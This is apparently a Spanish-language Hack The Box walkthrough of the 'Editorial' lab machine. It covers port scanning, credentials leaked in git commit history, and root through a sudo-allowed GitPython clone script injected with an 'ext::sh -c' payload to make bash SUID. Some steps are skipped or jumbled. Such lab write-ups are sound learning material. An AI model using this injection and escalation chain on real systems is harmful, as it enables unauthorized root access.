Editorial | Hack the box

Editorial | Hack the box

·

8 min read

lo primero hacemos un ping a la máquina para saber si nos responde

ping -c 1 10.10.11.20
PING 10.10.11.20 (10.10.11.20) 56(84) bytes of data.
64 bytes from 10.10.11.20: icmp_seq=1 ttl=63 time=158 ms

--- 10.10.11.20 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 157.795/157.795/157.795/0.000 ms

lanzamos el primer comando de nmap para descubimiento de puertos a la escucha

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:20 CET
Initiating SYN Stealth Scan at 20:20
Scanning 10.10.11.20 [65535 ports]
Discovered open port 22/tcp on 10.10.11.20
Discovered open port 80/tcp on 10.10.11.20
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.31% done; ETC: 20:20 (0:00:16 remaining)
cat allPorts 
# Nmap 7.93 scan initiated Mon Oct 28 20:20:18 2024 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allPorts 10.10.11.20
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.11.20 ()    Status: Up
Host: 10.10.11.20 ()    Ports: 22/open/tcp//ssh///, 80/open/tcp//http///    Ignored State: closed (65533)
# Nmap done at Mon Oct 28 20:20:38 2024 -- 1 IP address (1 host up) scanned in 19.42 seconds

solo tenemos el puerto 80 y 22, lanzamos el segundo comando con nmap para encontrar las versiones.

nmap -sCV -p22,80 10.10.11.20 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:21 CET
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_  256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
cat targeted 
# Nmap 7.93 scan initiated Mon Oct 28 20:21:58 2024 as: nmap -sCV -p22,80 -oN targeted 10.10.11.20
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_  256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Bien lo primero que haremos sera con whatweb ver si hay alguna vulnerabilidad

whatweb 10.10.11.20
http://10.10.11.20 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.20], RedirectLocation[http://editorial.htb], Title[301 Moved Permanently], nginx[1.18.0]
ERROR Opening: http://editorial.htb - no address for editorial.htb

En efecto vemos que no reporta no address, al intntar acceder desde el navegador no vemos nada. Intentamos enumerar algun script

nmap --script http-enum -p80 10.10.11.20 -oN webScan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:24 CET
Nmap scan report for 10.10.11.20
Host is up (0.17s latency).

PORT   STATE SERVICE
80/tcp open  http

Nos dice que esta aierto el puerto 80, asi que nos ponemos en escucha montanos un servidor en python

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Buscamos si tenemos permisos suid

find / -perm -4000 -user root 2>/dev/null
/opt/vivaldi/vivaldi-sandbox
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/ntfs-3g
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/libexec/polkit-agent-helper-1
/usr/sbin/exim4
/usr/sbin/pppd
/usr/share/codium/chrome-sandbox

Vos muchas rutas, pero nada que pueda aprobechar para elevar privilegios.

Pruebo a conectarme por ssh, veo que puedo, pero no tngo las contraseñas.

ssh editorial@10.10.11.20
The authenticity of host '10.10.11.20 (10.10.11.20)' can't be established.
ECDSA key fingerprint is SHA256:vD0RRLKSdq+ahh96RLgD4c6th30+PC391OHKI6SWlhY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.20' (ECDSA) to the list of known hosts.
editorial@10.10.11.20's password: 
Connection closed by 10.10.11.20 port 22

Vuelvo a la web, intento hacer fuzzing para ver rutas existntes. encuentro un directorio interesante, entro y he encontradoel password del usuario dev

sh dev@10.10.11.20
dev@10.10.11.20's password: 
Permission denied, please try again.
dev@10.10.11.20's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Mon Oct 28 08:26:33 PM UTC 2024

  System load:  0.0               Processes:             245
  Usage of /:   61.9% of 6.35GB   Users logged in:       2
  Memory usage: 14%               IPv4 address for eth0: 10.10.11.20
  Swap usage:   0%

veo la flag de usuario

cat user.txt

Intento ir al directorio root, pero no tengo permisos para ir a ese directorio. Busco permisos suid con find

ev@editorial:/$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/tmp/0xdf

veo el directorio passwd, intento entrar pero no tengo permisos y veo el siguiente error

ev@editorial:/usr/bin$ cat passwd 
�[����2[�D Qf9���d�7�Fvm�@k�b0j��N^�}��AGW �������x, ��*��9�eq��gF"_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable__cxa_finalize__libc_start_mainstderrdcgettext__fprintf_chkfputsfputcexitstdoutgetspnamgmtimestrftime__printf_chk__stack_chk_failfreestrcmp__errno_locationsetlocalestrdup__syslog_chk

con el comando getcap busco mas capabilities

dev@editorial:/usr/bin$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep

bueno, bien, no veo como aprobaechar eso ahora mismo. Sigo mirando con un ls y veo otro directorio

dev@editorial:~$ ls
apps  user.txt
dev@editorial:~$ cd apps/

Mediante una busqueda por internet veo que desde el directorio apps tengo que usar git para entrar en los diferentes entornos

dev@editorial:~/apps$ git log --oneline
8ad0f31 (HEAD -> master) fix: bugfix in api port endpoint
dfef9f2 change: remove debug and update api port
b73481b change(api): downgrading prod to dev
1e84a03 feat: create api to editorial info
3251ec9 feat: create editorial app

Voy probando por que no se lo que habrá en cada uno de ellos

dev@editorial:~/apps$ git log -p 3251ec9
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app

    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.

diff --git a/app_editorial/app.py b/app_editorial/app.py
new file mode 100644

Ahi no veo nada voy aprobar otro

ommit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
 @app.route(api_route + '/authors/message', methods=['GET'])
 def api_mail_new_authors():
     return jsonify({
-        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
     }) # TODO: replace dev credentials when checks pass

 # -------------------------------

ya puedo ver los nombres de usuarios del sistema y sus correspondientes contraseñas.

me hago usuario prod

dev@editorial:~/apps$ su prod
Password:

veo que permisos tengo

rod@editorial:~$ sudo -l
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

Veo que ese mensaje me dice que tengo permisos de ejecucion de root n el directorio indicado.

le hago un cat y leo el contenido

prod@editorial:~$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

ejecuto

prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext:: sh -c touch% /tmp/pwned'
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext:: sh -c touch% /tmp/pwned new_changes
  stderr: 'Cloning into 'new_changes'...
error: cannot run : No such file or directory
fatal: Can't run specified command
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

parece que da error, pero vuelvo a listar el directorio en el que estoy y veo un nuevo archivo pwned

prod@editorial:/tmp$ ls -l
total 156
-rwsrwsrwx 1 root root 125688 Oct 28 19:13 0xdf
-rw-r--r-- 1 root root      0 Oct 28 21:00 pwned
-rw-r--r-- 1 root root     33 Oct 28 16:32 root
-rw-rw-r-- 1 prod prod     42 Oct 28 15:06 shell.sh
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-ModemManager.service-UhnVKh
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-logind.service-3ntdas
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-resolved.service-ET5KMa
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-timesyncd.service-WEXcRM
drwx------ 3 root root   4096 Oct 28 16:28 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-upower.service-hICjtH
drwx------ 2 root root   4096 Oct 28 10:02 vmware-root_795-4257200573

Me hago un script en bash y me doy permisos de ejecucion de consola

prod@editorial:/tmp$ nano privesc

le doy permisis de ejecucion

editorial:/tmp$ chmod 775 privesc

vuelvo a ejecutar

prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c /tmp/privesc.sh'
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c /tmp/privesc.sh new_changes
  stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

listo el directorio actual

prod@editorial:/tmp$ sudo ./privesc.sh 
Sorry, user prod is not allowed to execute './privesc.sh' as root on editorial.
prod@editorial:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash
prod@editorial:/tmp$ bash -p 
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt

ya soy root.